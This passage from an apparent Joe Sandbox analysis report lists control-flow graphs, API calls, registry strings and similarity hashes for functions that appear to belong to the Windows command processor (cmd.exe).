558->562 562->525 562->528 567 7ff7d15247ae-7ff7d15247ca call 7ff7d15233f0 566->567 568 7ff7d1524564-7ff7d1524579 call 7ff7d152498c 566->568 567->539 568->545 576 7ff7d152457f-7ff7d1524584 call 7ff7d153a920 568->576 576->545
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 388421343-2905461000
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 84bd1d350d77b01b83f0786bfcac9955e31c9004c3aea83c9bf83a4dcce896ce
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF13B32A18A8B85FB60AB01E4543BEF6A0FB85780FD44176D94F82675DFBCE445CB60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 579 7ff7d1525554-7ff7d15255b9 call 7ff7d152a640 582 7ff7d15255bc-7ff7d15255e8 RegOpenKeyExW 579->582 583 7ff7d1525887-7ff7d152588e 582->583 584 7ff7d15255ee-7ff7d1525631 RegQueryValueExW 582->584 583->582 585 7ff7d1525894-7ff7d15258db time srand call 7ff7d1528f80 583->585 586 7ff7d1525637-7ff7d1525675 RegQueryValueExW 584->586 587 7ff7d152f248-7ff7d152f24d 584->587 591 7ff7d1525677-7ff7d152567c 586->591 592 7ff7d152568e-7ff7d15256cc RegQueryValueExW 586->592 589 7ff7d152f24f-7ff7d152f25b 587->589 590 7ff7d152f260-7ff7d152f265 587->590 589->586 590->586 594 7ff7d152f26b-7ff7d152f286 _wtol 590->594 595 7ff7d152f28b-7ff7d152f290 591->595 596 7ff7d1525682-7ff7d1525687 591->596 597 7ff7d15256d2-7ff7d1525710 RegQueryValueExW 592->597 598 7ff7d152f2b6-7ff7d152f2bb 592->598 594->586 595->592 601 7ff7d152f296-7ff7d152f2b1 _wtol 595->601 596->592 599 7ff7d1525729-7ff7d1525767 RegQueryValueExW 597->599 600 7ff7d1525712-7ff7d1525717 597->600 602 7ff7d152f2bd-7ff7d152f2c9 598->602 603 7ff7d152f2ce-7ff7d152f2d3 598->603 606 7ff7d1525769-7ff7d152576e 599->606 607 7ff7d152579f-7ff7d15257dd RegQueryValueExW 599->607 604 7ff7d152f2f9-7ff7d152f2fe 600->604 605 7ff7d152571d-7ff7d1525722 600->605 601->592 602->597 603->597 608 7ff7d152f2d9-7ff7d152f2f4 _wtol 603->608 604->599 613 7ff7d152f304-7ff7d152f31a wcstol 604->613 605->599 609 7ff7d152f320-7ff7d152f325 606->609 610 7ff7d1525774-7ff7d152578f 606->610 611 7ff7d152f3a9 607->611 612 7ff7d15257e3-7ff7d15257e8 607->612 608->597 614 7ff7d152f327-7ff7d152f33f wcstol 609->614 615 7ff7d152f34b 609->615 616 7ff7d152f357-7ff7d152f35e 610->616 617 7ff7d1525795-7ff7d1525799 610->617 624 7ff7d152f3b5-7ff7d152f3b8 611->624 618 7ff7d15257ee-7ff7d1525809 612->618 619 7ff7d152f363-7ff7d152f368 612->619 613->609 614->615 615->616 616->607 617->607 617->616 622 7ff7d152f39a-7ff7d152f39d 618->622 623 7ff7d152580f-7ff7d1525813 618->623 620 7ff7d152f36a-7ff7d152f382 wcstol 619->620 621 7ff7d152f38e 619->621 620->621 621->622 622->611 623->622 627 7ff7d1525819-7ff7d1525823 623->627 625 7ff7d152582c 624->625 626 7ff7d152f3be-7ff7d152f3c5 624->626 628 7ff7d1525832-7ff7d1525870 RegQueryValueExW 625->628 630 7ff7d152f3ca-7ff7d152f3d1 625->630 626->628 627->624 629 7ff7d1525829 627->629 631 7ff7d152f3dd-7ff7d152f3e2 628->631 632 7ff7d1525876-7ff7d1525882 RegCloseKey 628->632 629->625 630->631 633 7ff7d152f433-7ff7d152f439 631->633 634 7ff7d152f3e4-7ff7d152f412 ExpandEnvironmentStringsW 631->634 632->583 633->632 637 7ff7d152f43f-7ff7d152f44c call 7ff7d151b900 633->637 635 7ff7d152f428 634->635 636 7ff7d152f414-7ff7d152f426 call 7ff7d15213e0 634->636 639 7ff7d152f42e 635->639 636->639 637->632 639->633
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 145004033-3846321370
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 49f0bba741916081369efb74f02044f29ac6390f18ffb8293604677542a470ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE13826529A8BC6F760AB10E4501BEF7A0FB99744FD05137EA8F42A64DFBCD544CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15237D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 821 7ff7d15237d8-7ff7d1523887 GetCurrentThreadId OpenThread call 7ff7d15204f4 HeapSetInformation RegOpenKeyExW 824 7ff7d152e9f8-7ff7d152ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7d152388d-7ff7d15238eb call 7ff7d1525920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7d152ea41-7ff7d152ea59 GetThreadLocale 824->827 825->827 831 7ff7d15238f1-7ff7d1523913 memset 825->831 829 7ff7d152ea5b-7ff7d152ea67 827->829 830 7ff7d152ea74-7ff7d152ea77 827->830 829->830 832 7ff7d152ea79-7ff7d152ea7d 830->832 833 7ff7d152ea94-7ff7d152ea96 830->833 834 7ff7d1523919-7ff7d1523935 call 7ff7d1524d5c 831->834 835 7ff7d152eaa5 831->835 832->833 836 7ff7d152ea7f-7ff7d152ea89 832->836 833->835 841 7ff7d152393b-7ff7d1523942 834->841 842 7ff7d152eae2-7ff7d152eaff call 7ff7d1513240 call 7ff7d1538530 call 7ff7d1524c1c 834->842 837 7ff7d152eaa8-7ff7d152eab4 835->837 836->833 837->834 840 7ff7d152eaba-7ff7d152eac3 837->840 843 7ff7d152eacb-7ff7d152eace 840->843 844 7ff7d1523948-7ff7d1523962 _setjmp 841->844 845 7ff7d152eb27-7ff7d152eb40 _setjmp 841->845 850 7ff7d152eb00-7ff7d152eb0d 842->850 846 7ff7d152ead0-7ff7d152eadb 843->846 847 7ff7d152eac5-7ff7d152eac9 843->847 849 7ff7d1523968-7ff7d152396d 844->849 844->850 851 7ff7d15239fe-7ff7d1523a05 call 7ff7d1524c1c 845->851 852 7ff7d152eb46-7ff7d152eb49 845->852 846->837 853 7ff7d152eadd 846->853 847->843 855 7ff7d15239b9-7ff7d15239bb 849->855 856 7ff7d152396f 849->856 864 7ff7d152eb15-7ff7d152eb1f call 7ff7d1524c1c 850->864 851->824 858 7ff7d152eb4b-7ff7d152eb65 call 7ff7d1513240 call 7ff7d1538530 call 7ff7d1524c1c 852->858 859 7ff7d152eb66-7ff7d152eb6f call 7ff7d15201b8 852->859 853->834 867 7ff7d152eb20 855->867 868 7ff7d15239c1-7ff7d15239c3 call 7ff7d1524c1c 855->868 863 7ff7d1523972-7ff7d152397d 856->863 858->859 878 7ff7d152eb87-7ff7d152eb89 call 7ff7d15286f0 859->878 879 7ff7d152eb71-7ff7d152eb82 _setmode 859->879 871 7ff7d15239c9-7ff7d15239de call 7ff7d151df60 863->871 872 7ff7d152397f-7ff7d1523984 863->872 864->867 867->845 883 7ff7d15239c8 868->883 871->864 889 7ff7d15239e4-7ff7d15239e8 871->889 872->863 880 7ff7d1523986-7ff7d15239ae call 7ff7d1520580 GetConsoleOutputCP GetCPInfo call 7ff7d15204f4 872->880 890 7ff7d152eb8e-7ff7d152ebad call 7ff7d15258e4 call 7ff7d151df60 878->890 879->878 898 7ff7d15239b3 880->898 883->871 889->851 893 7ff7d15239ea-7ff7d15239ef call 7ff7d151be00 889->893 902 7ff7d152ebaf-7ff7d152ebb3 890->902 899 7ff7d15239f4-7ff7d15239fc 893->899 898->855 899->872 902->851 903 7ff7d152ebb9-7ff7d152ec24 call 7ff7d15258e4 GetConsoleOutputCP GetCPInfo call 7ff7d15204f4 call 7ff7d151be00 call 7ff7d1520580 GetConsoleOutputCP GetCPInfo call 7ff7d15204f4 902->903 903->890
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2624720099-1920437939
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4b892bcacf7056bc7a33056b5d9312e2c34e159c59401c98ff40f4847366f85d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54C1AD32F0864B8AF750BB6094542BCFAA1FF49754FD4417AE90F866B6DFBCA4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1118 7ff7d152823c-7ff7d152829b FindFirstFileExW 1119 7ff7d15282cd-7ff7d15282df 1118->1119 1120 7ff7d152829d-7ff7d15282a9 GetLastError 1118->1120 1124 7ff7d1528365-7ff7d152837b FindNextFileW 1119->1124 1125 7ff7d15282e5-7ff7d15282ee 1119->1125 1121 7ff7d15282af 1120->1121 1122 7ff7d15282b1-7ff7d15282cb 1121->1122 1126 7ff7d152837d-7ff7d1528380 1124->1126 1127 7ff7d15283d0-7ff7d15283e5 FindClose 1124->1127 1128 7ff7d15282f1-7ff7d15282f4 1125->1128 1126->1119 1129 7ff7d1528386 1126->1129 1127->1128 1130 7ff7d1528329-7ff7d152832b 1128->1130 1131 7ff7d15282f6-7ff7d1528300 1128->1131 1129->1120 1130->1121 1132 7ff7d152832d 1130->1132 1133 7ff7d1528332-7ff7d1528353 GetProcessHeap HeapAlloc 1131->1133 1134 7ff7d1528302-7ff7d152830e 1131->1134 1132->1120 1135 7ff7d1528356-7ff7d1528363 1133->1135 1136 7ff7d152838b-7ff7d15283c2 GetProcessHeap HeapReAlloc 1134->1136 1137 7ff7d1528310-7ff7d1528313 1134->1137 1135->1137 1138 7ff7d15350f8-7ff7d153511e GetLastError FindClose 1136->1138 1139 7ff7d15283c8-7ff7d15283ce 1136->1139 1140 7ff7d1528327 1137->1140 1141 7ff7d1528315-7ff7d1528323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 27c65da7f8d538de6f121bbd0d71dcc46de16a60aaae5e6e09062b1dca0debcd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A511532A09B4B86F700AF51A85417DBBA0FB5AB91BD48172DA5F43770CFBCE4548A20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1142 7ff7d1522978-7ff7d15229b6 1143 7ff7d15229b9-7ff7d15229c1 1142->1143 1143->1143 1144 7ff7d15229c3-7ff7d15229c5 1143->1144 1145 7ff7d15229cb-7ff7d15229cf 1144->1145 1146 7ff7d152e441 1144->1146 1147 7ff7d15229d2-7ff7d15229da 1145->1147 1148 7ff7d15229dc-7ff7d15229e1 1147->1148 1149 7ff7d1522a1e-7ff7d1522a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff7d15229e3-7ff7d15229eb 1148->1150 1151 7ff7d152e435-7ff7d152e439 1149->1151 1152 7ff7d1522a44-7ff7d1522a5c FindClose 1149->1152 1150->1147 1155 7ff7d15229ed-7ff7d1522a1c call 7ff7d1528f80 1150->1155 1151->1146 1153 7ff7d1522a62-7ff7d1522a6e 1152->1153 1154 7ff7d1522ae3-7ff7d1522ae5 1152->1154 1156 7ff7d1522a70-7ff7d1522a78 1153->1156 1157 7ff7d152e3f7-7ff7d152e3ff 1154->1157 1158 7ff7d1522aeb-7ff7d1522b10 _wcsnicmp 1154->1158 1156->1156 1160 7ff7d1522a7a-7ff7d1522a8d 1156->1160 1158->1153 1161 7ff7d1522b16-7ff7d152e3f1 _wcsicmp 1158->1161 1160->1146 1163 7ff7d1522a93-7ff7d1522a97 1160->1163 1161->1153 1161->1157 1165 7ff7d1522a9d-7ff7d1522ade memmove call 7ff7d15213e0 1163->1165 1166 7ff7d152e404-7ff7d152e407 1163->1166 1165->1150 1168 7ff7d152e40b-7ff7d152e413 1166->1168 1168->1168 1170 7ff7d152e415-7ff7d152e42b memmove 1168->1170 1170->1151
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0a000e2b9965f392e216a52b0a9aba1fc1a738f94547f6155f6b8c51109368fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8751E562B0868B85FB30AB1595442BEE290FB54BE0FD44272DE6F876F0DFBCE4418210
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 643 7ff7d1524d5c-7ff7d1524e4b InitializeCriticalSection call 7ff7d15258e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7d1520580 call 7ff7d1524a14 call 7ff7d1524ad0 call 7ff7d1525554 GetCommandLineW 654 7ff7d1524e4d-7ff7d1524e54 643->654 654->654 655 7ff7d1524e56-7ff7d1524e61 654->655 656 7ff7d1524e67-7ff7d1524e7b call 7ff7d1522e44 655->656 657 7ff7d15251cf-7ff7d15251e3 call 7ff7d1513278 call 7ff7d1524c1c 655->657 662 7ff7d15251ba-7ff7d15251ce call 7ff7d1513278 call 7ff7d1524c1c 656->662 663 7ff7d1524e81-7ff7d1524ec3 GetCommandLineW call 7ff7d15213e0 call 7ff7d151ca40 656->663 662->657 663->662 674 7ff7d1524ec9-7ff7d1524ee8 call 7ff7d152417c call 7ff7d1522394 663->674 678 7ff7d1524eed-7ff7d1524ef5 674->678 678->678 679 7ff7d1524ef7-7ff7d1524f1f call 7ff7d151aa54 678->679 682 7ff7d1524f21-7ff7d1524f30 679->682 683 7ff7d1524f95-7ff7d1524fee GetConsoleOutputCP GetCPInfo call 7ff7d15251ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7d1524f32-7ff7d1524f39 682->684 689 7ff7d1524ff0-7ff7d1525006 GetConsoleTitleW 683->689 690 7ff7d1525012-7ff7d1525018 683->690 684->683 686 7ff7d1524f3b-7ff7d1524f77 call 7ff7d1513278 GetWindowsDirectoryW 684->686 695 7ff7d1524f7d-7ff7d1524f90 call 7ff7d1523c24 686->695 696 7ff7d15251b1-7ff7d15251b9 call 7ff7d1524c1c 686->696 689->690 692 7ff7d1525008-7ff7d152500f 689->692 693 7ff7d152507a-7ff7d152507e 690->693 694 7ff7d152501a-7ff7d1525024 call 7ff7d1523578 690->694 692->690 697 7ff7d15250eb-7ff7d1525161 GetModuleHandleW GetProcAddress * 3 693->697 698 7ff7d1525080-7ff7d15250b3 call 7ff7d153b89c call 7ff7d151586c call 7ff7d1513240 call 7ff7d1523448 693->698 694->693 706 7ff7d1525026-7ff7d1525030 694->706 695->683 696->662 704 7ff7d152516f 697->704 705 7ff7d1525163-7ff7d1525167 697->705 724 7ff7d15250d2-7ff7d15250d7 call 7ff7d1513278 698->724 725 7ff7d15250b5-7ff7d15250d0 call 7ff7d1523448 * 2 698->725 710 7ff7d1525172-7ff7d15251af free call 7ff7d1528f80 704->710 705->704 709 7ff7d1525169-7ff7d152516d 705->709 711 7ff7d1525032-7ff7d1525059 GetStdHandle GetConsoleScreenBufferInfo 706->711 712 7ff7d1525075 call 7ff7d153cff0 706->712 709->704 709->710 715 7ff7d1525069-7ff7d1525073 711->715 716 7ff7d152505b-7ff7d1525067 711->716 712->693 715->693 715->712 716->693 729 7ff7d15250dc-7ff7d15250e6 GlobalFree 724->729 725->729 729->697
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15258E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7D153C6DB), ref: 00007FF7D15258EF
